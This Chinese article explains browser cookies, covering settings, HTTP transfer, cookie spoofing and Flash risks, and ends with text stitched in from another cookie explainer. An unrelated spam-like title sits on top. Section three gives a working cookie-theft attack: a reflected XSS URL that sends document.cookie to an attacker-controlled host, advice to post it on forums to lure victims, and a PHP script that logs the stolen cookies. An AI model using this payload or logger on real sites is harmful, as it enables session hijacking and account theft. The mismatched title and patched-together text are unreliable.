乳晕怎么变淡:cookie 是指什么

编者按：Cookie在英文中是小甜品的意思，而这个词我们总能在浏览器中看到，食品怎么会跟浏览器扯上关系呢？在你浏览以前登陆过的网站时可能会在网页中出现：你好XX，感觉很亲切，就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的，因此这个文件也就被称为了Cookie。想全面了解Cookie吗？看看下文吧！

一.了解Cookie 适用对象：初级读者

Cookie是当你浏览某网站时，网站存储在你机器上的一个小文本文件，它记录了你的用户ID，密码、浏览过的网页、停留的时间等信息，当你再次来到该网站时，网站通过读取Cookie，得知你的相关信息，就可以做出相应的动作，如在页面显示欢迎你的标语，或者让你不用输入ID、密码就直接登录等等。你可以在IE的“工具/Internet选项”的“常规”选项卡中，选择“设置/查看文件”，查看所有保存到你电脑里的Cookie。这些文件通常是以user@domain格式命名的，user是你的本地用户名，domain是所访问的网站的域名。如果你使用NetsCape浏览器，则存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，与IE不同的是，NETSCAPE是使用一个Cookie 文件记录所有网站的Cookies。

为了保证上网安全我们需要对Cookie进行适当设置。打开“工具/Internet选项”中的“隐私”选项卡（注意该设置只在IE6.0中存在，其他版本IE可以在“工具/Internet选项”的“安全”标签中单击“自定义级别”按钮，进行简单调整），调整Cookie的安全级别。通常情况，可以将滑块调整到“中高”或者“高”的位置。多数的论坛站点需要使用Cookie信息，如果你从来不去这些地方，可以将安全级调到“阻止所有Cookies”。如果只是为了禁止个别网站的Cookie，可以单击“编辑”按钮，将要屏蔽的网站添加到列表中。在“高级”按钮选项中，你可以对第一方Cookie和第三方的Cookie进行设置，第一方Cookie是你正在浏览的网站的Cookie，第三方Cookie非正在浏览的网站发给你的Cookie，通常要对第三方Cookie选择“拒绝”，如图1。你如果需要保存Cookie，可以使用IE的“导入导出”功能，打开“文件/导入导出”，按提示操作即可。

Cookie中的内容大多数经过了加密处理，因此在我们看来只是一些毫无意义的字母数字组合，只有服务器的CGI处理程序才知道它们真正的含义。通过一些软件我们可以查看到更多的内容，使用Cookie Pal软件查看到的Cookie信息，如图2所示。它为我们提供了Server、Expires、Name、Value等选项的内容。其中，Server是存储Cookie的网站，Expires记录了Cookie的时间和生命期，Name和value字段则是具体的数据（本报第10期第42版对该软件有详细介绍）。
下载地址：http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe。

二、Cookie的传递流程 适用对象：中级读者

当在浏览器地址栏中键入了一个Web站点的URL，浏览器会向该Web站点发送一个读取网页的请求，并将结果在显示器上显示。这时该网页在你的电脑上寻找Amazon网站设置的Cookie文件，如果找到，浏览器会把Cookie文件中的数据连同前面输入的URL一同发送到Amazon服务器。服务器收到Cookie数据，就会在他的数据库中检索你的ID，你的购物记录、个人喜好等信息，并记录下新的内容，增加到数据库和Cookie文件中去。如果没有检测到Cookie或者你的Cookie信息与数据库中的信息不符合，则说明你是第一次浏览该网站，服务器的CGI程序将为你创建新的ID信息，并保存到数据库中。
Cookie是利用了网页代码中的HTTP头信息进行传递的，浏览器的每一次网页请求，都可以伴随Cookie传递，例如，浏览器的打开或刷新网页操作。服务器将Cookie添加到网页的HTTP头信息中，伴随网页数据传回到你的浏览器，浏览器会根据你电脑中的Cookie设置选择是否保存这些数据。如果浏览器不允许Cookie保存，则关掉浏览器后，这些数据就消失。Cookie在电脑上保存的时间是不一样的，这些都是由服务器的设置不同决定得。Cookie有一个Expires（有效期）属性，这个属性决定了Cookie的保存时间，服务器可以通过设定Expires字段的数值，来改变Cookie的保存时间。如果不设置该属性，那么Cookie只在浏览网页期间有效，关闭浏览器，这些Cookie自动消失，绝大多数网站属于这种情况。通常情况下，Cookie包含Server、Expires、Name、Value这几个字段，其中对服务器有用的只是Name和Value字段，Expires等字段的内容仅仅是为了告诉浏览器如何处理这些Cookies。

三、Cookie的编程实现 适用对象：高级读者

多数网页编程语言都提供了对Cookie的支持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在这些面向对象的编程语言中，对Cookie的编程利用基本上是相似的，大体过程为：先创建一个Cookie对象（Object），然后利用控制函数对Cookie进行赋值、读取、写入等操作。那么如何通过代码来获取其他用户Cookie中的敏感信息？下面进行简单的介绍。
该方法主要有两步，首先要定位你需要收集Cookie的网站，并对其进行分析，并构造URL；然后编制收集Cookie的PHP代码，并将其放到你可以控制的网站上，当不知情者单击了你构造的URL后可以执行该PHP代码。下面我们看具体的实现过程。

1.分析并构造URL

首先打开我们要收集Cookie的网站，这里假设是http://www.XXX.net，登陆网站输入用户名“<A1>”（不含引号），对数据进行分析抓包，得到形如“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6”的代码，将“<A1>”更换为“<script>alert(document.cookie)</script>”再试；如果执行成功，就开始构造URL：“http://www.XXX.net/txl/login/login.pl?username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能够控制的某台主机上的一个脚本。需要注意的是“%2B”为符号“+”的URL编码，因为“+”将被作为空格处理。该URL就可以在论坛中发布，诱使别人点击了。

2.编制PHP脚本

该脚本的作用就是收集Cookie文件，具体内容如下：

<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://www.XXX.net");
?>

四、Cookie的安全问题 适用对象：所有希望上网安全的读者

1.Cookie欺骗

Cookie记录着用户的帐户ID、密码之类的信息，如果在网上传递，通常使用的是MD5方法加密。这样经过加密处理后的信息，即使被网络上一些别有用心的人截获，也看不懂，因为他看到的只是一些无意义的字母和数字。然而，现在遇到的问题是，截获Cookie的人不需要知道这些字符串的含义，他们只要把别人的Cookie向服务器提交，并且能够通过验证，他们就可以冒充受害人的身份，登陆网站。这种方法叫做Cookie欺骗。Cookie欺骗实现的前提条件是服务器的验证程序存在漏洞，并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录是非常困难的，例如，编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的，用支持Cookie的语言编写一小段代码就可以实现（具体方法见三），只要把这段代码放到网络里，那么所有人的Cookie都能够被收集。如果一个论坛允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到论坛里，然后给帖子取一个吸引人的主题，写上有趣的内容，很快就可以收集到大量的Cookie。在论坛上，有许多人的密码就被这种方法盗去的。至于如何防范，目前还没有特效药，我们也只能使用通常的防护方法，不要在论坛里使用重要的密码，也不要使用IE自动保存密码的功能，以及尽量不登陆不了解底细的网站。

2.Flash的代码隐患

Flash中有一个getURL（）函数，Flash可以利用这个函数自动打开指定的网页。因此它可能把你引向一个包含恶意代码的网站。打个比方，当你在自己电脑上欣赏精美的Flash动画时，动画帧里的代码可能已经悄悄地连上网，并打开了一个极小的包含有特殊代码的页面。这个页面可以收集你的Cookie、也可以做一些其他的事情，比如在你的机器上种植木马甚至格式化你的硬盘等等。对于Flash的这种行为，网站是无法禁止的，因为这是Flash文件的内部行为。我们所能做到的，如果是在本地浏览尽量打开防火墙，如果防火墙提示的向外发送的数据包并不为你知悉，最好禁止。如果是在Internet上欣赏，最好找一些知名的大网站。

什么是Cookie呢？我们浏览某些Web站点时，这些站点会在你的硬盘上用很小的文本文件存储了一些信息，这些文件就称为Cookie。Cookie中包含的信息与你和你的爱好有关。例如，你在某家航空公司站点查阅航班时刻表，该站点可能就创建了包含你旅行计划的Cookie，也可能它只记录了你在该站点上曾经访问过的Web页，在你下次访问时，网站根据你的情况对显示的内容进行调整，将你所感兴趣的内容放在前列。这是一种很高档的Cookie应用。目前Cookie最广泛地应用在用户登录上，这样我们就不用每次都输入自己的用户名、密码了

因特网的Cookie技术极其简单，却有着旺盛的生命力。Cookie开始引起众人的注意是从2000年二月份随着网络隐私权的提出开始的，有关的辩论至今仍在继续。从另一方面来说，Cookie使得浏览网页更容易了。几乎所有的主要的网站设计者都使用了Cookie，因为他们想为浏览网站的人提供一个更好的浏览环境，同时也能更加准确地收集访客的信息。

家颇有影响的报纸上曾刊登了一篇很有深度的关于网络隐私的文章，上面对于Cookie的定义是这样的：

“Cookie是Web网站放在您的硬盘上的程序。它守在您的电脑里，搜集您的信息以及您在因特网上所做的任何事情，当Web站点需要的时候它能够下载所有这些搜集到的信息。”

像这样的定义在报刊中相当普遍。问题是，它的定义犯了很大的错误。Cookie不是程序，而且它不能像程序一样地运行，所以它无法为自己搜集任何信息。它也不能从您的电脑上取得您的任何个人资料。

Cookie的比较确切的定义应该是这个样子：

“Cookie是Web服务器保存在用户硬盘上的一段文本。Cookie允许一个Web站点在用户的电脑上保存信息并且随后再取回它。信息的片断以‘名/值’对(name-value pairs)的形式储存。”

举例来说，一个Web站点可能会为每一个访问者产生一个唯一的ID，然后以Cookie文件的形式保存在每个用户的机器上。

如果您使用IE浏览器访问Web，您会看到所有保存在您的硬盘上的Cookie。它们最常存放的地方是：c:\windows\cookies(在Win 2000中则是C:\Documents and Settings\您的用户名\Cookies——作者注)。在我的机器上共有165个文件。每一个文件都是一个由“名/值”对组成的文本文件，另外还有一个文件保存有所有对应的Web站点的信息。

在这个文件夹里的每个Cookie文件都是一个简单而又普通的文本文件。透过文件名，您可以看到是哪个Web站点在您的机器上放置了Cookie（当然站点信息在文件里也有保存）。您也能双击打开每一个Cookie文件。

比如，我访问了goto.com，而且这个站点在我的电脑上放了个Cookie。goto.com的Cookie文件包含了这样的内容：

UserID A9A3BECE0563982D www.goto.com/

goto.com在我的电脑上存入了一个单一的“名/值”对。“名/值”对的“名”是UserID，“值”是A9A3BECE0563982D。在我第一次访问goto.com的时候，该网站为我分配了一个唯一的ID并存在我的电脑里。

（注：除了上面举例的“名/值”对，可能会有其它的“名/值”对同时保存下来。那是浏览器的一些内部信息，一般用户不必多做了解。）

Amazon.com在我的电脑上保存了稍稍多一些的信息。当我查看Amazon在我的电脑上建立的Cookie文件时，它包含以下内容:

session-id-time 954242000 amazon.com/

session-id 002-4135256-7625846 amazon.com/

x-main eKQIfwnxuF7qtmX52x6VWAXh@Ih6Uo5H amazon.com/

ubid-main 077-9263437-9645324 amazon.com/

以上内容显示出Amazon存储了一个主用户ID ubid-main，一个标记每次任务的ID session-id及任务发生的时间session-id-time。还有一个x-main，不知道是什么。

大多数的网站在您的电脑上只保存一条信息，即用户ID。但一个站点可以用Cookie存储的“名/值”对的最大数目没有任何限制。

一个“名/值”对仅仅是一条命名的数据，它不是程序，也不能“做”任何事情。一个网站只能取得它放在您的电脑中的信息，它无法从其它的Cookie文件中取得信息，也无法得到您的电脑上的其它任何东西

我们浏览某些Web站点时，这些站点会在你的硬盘上用很小的文本文件存储了一些信息，这些文件就称为Cookie。